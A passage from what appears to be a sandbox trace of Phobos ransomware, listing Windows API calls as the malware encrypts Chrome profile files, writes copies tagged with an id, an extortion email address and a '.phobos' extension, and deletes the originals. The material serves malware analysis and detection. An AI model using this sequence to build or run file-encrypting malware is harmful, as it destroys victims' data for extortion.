pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0185.714] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.714] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0185.714] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.714] CloseHandle (hObject=0x134) returned 1 [0185.714] CloseHandle (hObject=0x180) returned 1 [0185.714] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current")) returned 1 [0185.715] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.715] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.715] CloseHandle (hObject=0x180) returned 1 [0185.715] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.716] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=195) returned 1 [0185.716] CloseHandle (hObject=0x180) returned 1 [0185.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log")) returned 0x2020 [0185.716] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.716] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.716] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.717] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.717] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xc3, lpOverlapped=0x0) returned 1 [0185.718] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd0, dwBufLen=0xd0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd0) returned 1 [0185.718] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xd0, lpOverlapped=0x0) returned 1 [0185.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0185.723] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.723] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0185.723] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.723] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0185.723] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.723] CloseHandle (hObject=0x180) returned 1 [0185.723] CloseHandle (hObject=0x134) returned 1 [0185.723] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\log")) returned 1 [0185.741] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.744] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=41) returned 1 [0185.744] CloseHandle (hObject=0x134) returned 1 [0185.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001")) returned 0x2020 [0185.745] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.745] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.745] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.746] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.746] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.746] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x29, lpOverlapped=0x0) returned 1 [0185.747] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0185.747] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0185.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0185.748] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.748] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.748] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.748] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.748] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.748] CloseHandle (hObject=0x134) returned 1 [0185.748] CloseHandle (hObject=0x180) returned 1 [0185.748] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001")) returned 1 [0185.749] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.762] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=20480) returned 1 [0185.762] CloseHandle (hObject=0x12c) returned 1 [0185.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites")) returned 0x2020 [0185.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.763] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.763] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0185.764] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.764] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5000, lpOverlapped=0x0) returned 1 [0185.787] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5010, dwBufLen=0x5010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5010) returned 1 [0185.787] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5010, lpOverlapped=0x0) returned 1 [0185.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0185.788] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.788] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.788] CryptDestroyKey (hKey=0xa32de8) returned 1 [0185.788] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.788] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.788] CloseHandle (hObject=0x12c) returned 1 [0185.788] CloseHandle (hObject=0x194) returned 1 [0185.788] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites")) returned 1 [0185.789] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.790] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.790] CloseHandle (hObject=0x194) returned 1 [0185.790] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.791] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=632) returned 1 [0185.791] CloseHandle (hObject=0x194) returned 1 [0185.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity")) returned 0x2020 [0185.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0185.791] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.791] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0185.791] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.791] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x278, lpOverlapped=0x0) returned 1 [0185.795] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x280, dwBufLen=0x280 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x280) returned 1 [0185.795] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x280, lpOverlapped=0x0) returned 1 [0185.795] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0185.795] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.795] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0185.795] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.795] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0185.796] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.796] CloseHandle (hObject=0x194) returned 1 [0185.796] CloseHandle (hObject=0x12c) returned 1 [0185.796] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity")) returned 1 [0185.797] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.833] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=131072) returned 1 [0185.833] CloseHandle (hObject=0x12c) returned 1 [0185.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links")) returned 0x2020 [0185.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0185.834] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: 